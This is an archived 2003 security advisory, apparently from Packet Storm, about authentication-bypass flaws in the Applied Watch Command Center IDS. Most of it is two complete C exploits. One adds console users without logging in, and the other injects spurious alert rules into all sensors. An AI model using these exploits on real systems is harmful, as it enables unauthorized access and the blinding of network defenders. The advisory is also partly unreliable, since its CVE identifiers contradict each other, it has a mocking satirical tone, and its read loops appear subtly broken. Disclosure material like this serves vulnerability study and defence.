what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

_BSSADV-0000.txt

_BSSADV-0000.txt
Posted Dec 1, 2003
Authored by The Bugtraq Team | Site bugtraq.org

Bugtraq Security Systems Security Advisory - Multiple vulnerabilities have been discovered in the Applied Watch Command Center IDS. Two exploits have been released to demonstrate these flaws. The first, appliedsnatch.c, allows a remote attacker to add a user to the console without having to authenticate to the system. The second, addrule.c, allows a remote attacker to add custom IDS alerts to all sensor nodes in a network, enabling a human denial-of-service attack by making good packets look bad.

tags | exploit, remote, vulnerability
advisories | CVE-2003-0970, CVE-2003-0971
SHA-256 | 89d611aba3b2b3bd598156b14a689aeb759d16617579758d1bce7e8b845eb94c

_BSSADV-0000.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Bugtraq Security Systems, Incorporated
www.bugtraq.org

Security Advisory

Advisory Name: Multiple Issues in Applied Watch Command Center
Release Date: 11/27/2003
Application: Applied Watch
Platform: Linux (IA32)
Linux (sparc)
Linux (sparc64)
Linux (hppa)
Linux (ppc)
Linux (xbox)
Linux (IA64)
SUN Solaris (IA32)
SUN Solaris (sparc)
SUN Solaris (sparc64)
OpenBSD (386)
HPUX (hppa)
HPUX (IA64)
Compaq True64
Microsoft Windows NT (Alpha)
Microsoft Windows NT (IA32)
Severity: Secure protocol implementation weaknesses, allows for
authentication bypass and compromise of IDS nodes.
Author: The Bugtraq Team, Collectively [bugtraq@bugtraq.org]
Vendor Status: Patches pending.
CVE Candidate: CAN-2003-0970 - Authentication Bypass to Add IDS Rules
CAN-2003-0971 - Authentication Bypass to Add Users
Reference: www.bugtraq.org/advisories/_BSSADV-0000.txt


Overview:
The Applied Watch Command Center boasts the industry's first
truly OS-native platform for managing network threats in real-time. It
frees users from the unreliable, more difficult, and less-secure
Web-based monitoring enviornment of Snort IDS sensors. From a central,
desktop console Supporting Mac, Linux, Unix, and Windows, thousands of
IDS agents and the server can be monitored. The Command Center gives
you these benefits:

1. Interprets alerts generated by third-party solutions, parsing
the alerts into high, medium, and low priority;
2. Allows you to identify false positives;
3. Lets you store notes on events to prevent duplication of
effort, saving valuable man-hours;
4. Provides greater security with an OS-native, desktop console;
5. Lets you avoid the high cost of Security Information Management
Systems (SIMs); and
6. Reduces your IDS cost of ownership.

It should also be noted that the lead developer of this system is
named Jason Ish, who is a member of the core OpenBSD development team
and is therefor a security expert. He has a son named Theo, named after
the great pioneer of proactive security, Theo Deraadt.

There exist a number of vulnerabilities in the various components
of the Applied Watch software suite; this advisory being the first of
many to come regarding the various logic-related security vulnerabilities
in the software. After all such problems are eliminated from the codebase,
we will begin releasing another set of advisories concerning multiple
instances in the code that allow for the remote execution of arbitrary code
throughout the various components of this system.


Details:

[1] Adding a User

Using the attached program, appliedsnatch.c, a malicious individual on a
network protected by the Applied Watch Solution can add new users to a
console, without having to authenticate to the system.

- --- begin appliedsnatch.c ---

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/ssl.h>

#define PUT_UINT32(i, val)\
{\
buf[(i) ++] = ((val) >> 24) & 0xff;\
buf[(i) ++] = ((val) >> 16) & 0xff;\
buf[(i) ++] = ((val) >> 8) & 0xff;\
buf[(i) ++] = (val) & 0xff;\
}

int main(int argc, char *argv[])
{
unsigned char *buf;
unsigned int idx, i;
size_t userlen, passlen, buflen, lenidx;
int sock;
struct sockaddr_in sin;
unsigned char respbuf[28];
ssize_t n;
SSL_CTX *sslctx;
SSL *ssl;

if (argc != 5) { fprintf(stderr, "usage: %s <host> <port> <user> <pass>\n", argv[0]); exit(1); }
userlen = strlen(argv[3]);
passlen = strlen(argv[4]);
buf = malloc(buflen = 12 + 4 + userlen + 4 + 4 + passlen + 4 + 4 + 4);
memset(buf, 0, buflen);
idx = 0;
PUT_UINT32(idx, 0xbabe0001); /* 0xbabe0002 for other protocol ver */
PUT_UINT32(idx, 0x6a);
lenidx = idx;
PUT_UINT32(idx, 0xf00fc7c8);
//PUT_UINT32(idx, 0); /* uncomment for other protocol ver */
PUT_UINT32(idx, userlen);
memcpy(&buf[idx], argv[3], userlen); idx += userlen;
idx |= 3; idx ++;
PUT_UINT32(idx, passlen);
memcpy(&buf[idx], argv[4], passlen); idx += passlen;
idx |= 3; idx ++;
PUT_UINT32(idx, 0x1);
PUT_UINT32(idx, 0x1);
PUT_UINT32(lenidx, idx);
printf("connecting\n");
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(atoi(argv[2]));
if ((sin.sin_addr.s_addr = inet_addr(argv[1])) == -1)
{
struct hostent *he;

if ((he = gethostbyname(argv[1])) == NULL) { perror("gethostbyname()"); exit(1); }
memcpy(&sin.sin_addr, he->h_addr, 4);
}
sock = socket(AF_INET, SOCK_STREAM, 0);
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) { perror("connect()"); exit(1); }
printf("doing ssl handshake\n");
SSL_load_error_strings();
SSL_library_init();
if ((sslctx = SSL_CTX_new(SSLv23_client_method())) == NULL) { fprintf(stderr, "SSL_CTX_new()\n"); exit(1); }
if ((ssl = SSL_new(sslctx)) == NULL) { fprintf(stderr, "SSL_new()\n"); exit(1); }
if (SSL_set_fd(ssl, sock) != 1) { fprintf(stderr, "SSL_set_fd()\n"); exit(1); }
if (SSL_connect(ssl) != 1) { fprintf(stderr, "SSL_connect()\n"); exit(1); }
printf("sending %u bytes:\n", idx);
for (i = 0; i < idx; i ++) printf("%.2x ", buf[i]);
if (SSL_write(ssl, buf, idx) != idx) { perror("write()"); exit(1); }
printf("\nreading:\n");
i = 0;
while (i < sizeof(respbuf))
{
if ((n = SSL_read(ssl, &respbuf[i], sizeof(respbuf) - i)) < 0) { perror("read()"); exit(1); }
i -= n;
}
for (i = 0; i < sizeof(respbuf); i ++) printf("%.2x ", respbuf[i]);
printf("\n");
printf("adding user \"%s\" with password \"%s\" %s\n", argv[3], argv[4], (memcmp(&respbuf[16], "\x00\x00\x00\x00", 4) == 0)? "succeeded" : "failed");
SSL_shutdown(ssl);
close(sock);
return 0;
}

- --- end appliedsnatch.c ---


[2] Adding a Rule

Using the second attached program, addrule.c, a malicious individual can
introduce custom IDS alerts to all sensor nodes on a network, allowing a
human denial-of-service attack against the security experts monitoring the
console. This is a valid technique for subverting intrusion detection
systems. This is also a demonstration of the "sometimes good packets look
like bad packets, while bad packets go unnoticed by the intrusion detection
system" concept.

- --- begin addrule.c ---

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/ssl.h>

#define PUT_UINT32(i, val)\
{\
buf[(i) ++] = ((val) >> 24) & 0xff;\
buf[(i) ++] = ((val) >> 16) & 0xff;\
buf[(i) ++] = ((val) >> 8) & 0xff;\
buf[(i) ++] = (val) & 0xff;\
}

int main(int argc, char *argv[])
{
unsigned char *buf;
unsigned int idx, i;
size_t rulelen, buflen, lenidx;
int sock;
struct sockaddr_in sin;
unsigned char respbuf[28];
ssize_t n;
SSL_CTX *sslctx;
SSL *ssl;
unsigned char *ruleset = "alert tcp any any -> any any (msg: \"*GOBBLE* *GOBBLE* *GOBBLE* *GOBBLE* \\:PpppppPPppppppPPPPPPpppp\";)";

if (argc != 3) { fprintf(stderr, "usage: %s <host> <port>\n", argv[0]); exit(1); }
rulelen = strlen(ruleset);
buf = malloc(buflen = 12 + 4 + 4 + 4 + rulelen + 4);
memset(buf, 0, buflen);
idx = 0;
PUT_UINT32(idx, 0xbabe0001); /* 0xbabe0002 for other protocol ver */
PUT_UINT32(idx, 0x6f);
lenidx = idx;
PUT_UINT32(idx, 0xf00fc7c8);
//PUT_UINT32(idx, 0); /* uncomment for other protocol ver */
PUT_UINT32(idx, 0);
PUT_UINT32(idx, 1);
PUT_UINT32(idx, rulelen);
memcpy(&buf[idx], ruleset, rulelen); idx += rulelen;
idx |= 3; idx ++;
PUT_UINT32(lenidx, idx);
printf("connecting\n");
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(atoi(argv[2]));
if ((sin.sin_addr.s_addr = inet_addr(argv[1])) == -1)
{
struct hostent *he;

if ((he = gethostbyname(argv[1])) == NULL) { perror("gethostbyname()"); exit(1); }
memcpy(&sin.sin_addr, he->h_addr, 4);
}
sock = socket(AF_INET, SOCK_STREAM, 0);
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) { perror("connect()"); exit(1); }
printf("doing ssl handshake\n");
SSL_load_error_strings();
SSL_library_init();
if ((sslctx = SSL_CTX_new(SSLv23_client_method())) == NULL) { fprintf(stderr, "SSL_CTX_new()\n"); exit(1); }
if ((ssl = SSL_new(sslctx)) == NULL) { fprintf(stderr, "SSL_new()\n"); exit(1); }
if (SSL_set_fd(ssl, sock) != 1) { fprintf(stderr, "SSL_set_fd()\n"); exit(1); }
if (SSL_connect(ssl) != 1) { fprintf(stderr, "SSL_connect()\n"); exit(1); }
printf("sending %u bytes:\n", idx);
for (i = 0; i < idx; i ++) printf("%.2x ", buf[i]);
if (SSL_write(ssl, buf, idx) != idx) { perror("write()"); exit(1); }
printf("\nreading:\n");
i = 0;
while (i < sizeof(respbuf))
{
if ((n = SSL_read(ssl, &respbuf[i], sizeof(respbuf) - i)) < 0) { perror("read()"); exit(1); }
i -= n;
}
for (i = 0; i < sizeof(respbuf); i ++) printf("%.2x ", respbuf[i]);
printf("\n");
printf("adding nasty ruleset %s\n", (memcmp(&respbuf[16], "\x00\x00\x00\x00", 4) == 0)? "succeeded" : "failed");
SSL_shutdown(ssl);
close(sock);
return 0;
}

- --- end addrule.c ---


Vendor Response:
Bugtraq Security have attempted to contact the vendor multiple
times since the discovery of these vulnerabilities without success. A
public statement issued by the founder of the company, Eric Hines, helps
us understand why the company was unavailable for comment at the time:

"You've got to realize that these people are walking around with
exploits that vendors haven't even heard of yet. They're pissed and
they've got this almost God-like power that enables them to break into
any network that they want," Hines said. He reported that FateLabs.com
was knocked offline last week by a denial-of-service attack immediately
after the security firm published an advisory about a security bug.

We expect that once their network recovers from said incident, that
they will issue binary patches to both their clients and help reduce the
threat of compromise against those networks. Undoubtably they are aware
of these vulnerabilities already, and were hoping they would be brought
to public attention as, according to their website, they are "soldiers
for full disclosure".

ThreatCon:
The release of this information and exploits increases the Global
ThreatCon Level to a record-breaking index of 9/13 (more dangerous than
normal) level. We hope that Applied Watch will release their patches
soon so that the ThreatCon can be lowered to a more reasonable level. If
you have any questions regarding the Global ThreatCon, please visit
http://www.bugtraq.org/threatcon.html


Recommendation:
If the security of your network is required, then Fatelabs /
AppliedWatch products should be removed or disabled on the host in
question. If it is not required, enterprises should deploy vendor patches
for the above vulnerabilities when they become available. In addition,
enterprises should look to remove all default services if not required in
production systems or adequately protect those that are required and
undertake other obvious security measures.

Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues. These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

CAN-2003-0960 - Logical error in Applied Watch Console allowing user-adds
CAN-2003-0961 - Logical error in Applied Watch Nodes allowing rule-adds

Bugtraq Security Systems Vulnerability Reporting Policy:
http://www.bugtraq.org/research/policy/

Bugtraq Security Systems Advisory Archive:
http://www.bugtraq.org/advisories.html

Bugtraq Security Systems PGP Key:
http://www.bugtraq.org/pgp_key.asc

Bugtraq Security Systems is currently seeking application security experts
to fill several consulting positions. Applicants should have strong
application development skills and be able to perform application security
design reviews, code reviews, and application penetration testing. Please
send resumes to jobs@bugtraq.org

Copyright 2003 Bugtraq Security Systems. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE/xqQad3IqHnpF3voRAk2vAJ9a7JgZ8p/FRCdgN/qjqYMEyYnj+QCgkGor
vYwTicr3iCtfdrbxc0eeocY=
=GAEl
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close